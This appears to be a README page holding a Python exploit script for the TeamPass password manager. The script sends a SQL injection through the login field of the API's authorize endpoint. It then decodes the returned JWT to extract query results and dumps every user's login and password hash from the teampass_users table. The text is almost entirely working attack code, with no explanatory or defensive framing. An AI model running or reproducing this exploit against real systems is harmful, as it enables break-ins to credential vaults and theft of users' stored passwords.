README.md
Rendering markdown...
import sys
import requests
import base64
import re
import json
import subprocess
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <base-url>")
sys.exit(1)
base_url = sys.argv[1]
vulnerable_url = f"{base_url}/api/index.php/authorize"
try:
response = requests.get(vulnerable_url)
if "API usage is not allowed" in response.text:
print("API feature is not enabled :-(")
sys.exit(1)
except requests.RequestException as e:
print(f"Error: {e}")
sys.exit(1)
# Generate arbitrary hash
arbitrary_hash = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'
def exec_sql(query):
inject = f"none' UNION SELECT id, '{arbitrary_hash}', ({query}), private_key, personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' FROM teampass_users WHERE login='admin"
data = {
"login": inject,
"password": "h4ck3d",
"apikey": "foo"
}
headers = {"Content-Type": "application/json"}
try:
response = requests.post(vulnerable_url, headers=headers, json=data)
response.raise_for_status()
token = response.json().get('token', '')
if not token:
return None
# Extract public_key from token
parts = token.split('.')
if len(parts) < 2:
return None
payload = parts[1]
# Fix padding if necessary
payload += '=' * ((4 - len(payload) % 4) % 4)
decoded = base64.b64decode(payload)
public_key = json.loads(decoded).get('public_key', '')
return public_key
except requests.RequestException as e:
print(f"Error: {e}")
return None
users = exec_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
if users is None:
print("Failed to get user count")
sys.exit(1)
print(f"There are {users} users in the system:")
for i in range(int(users)):
username = exec_sql(f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1")
password = exec_sql(f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1")
if username is not None and password is not None:
print(f"{username}: {password}")
if __name__ == "__main__":
main()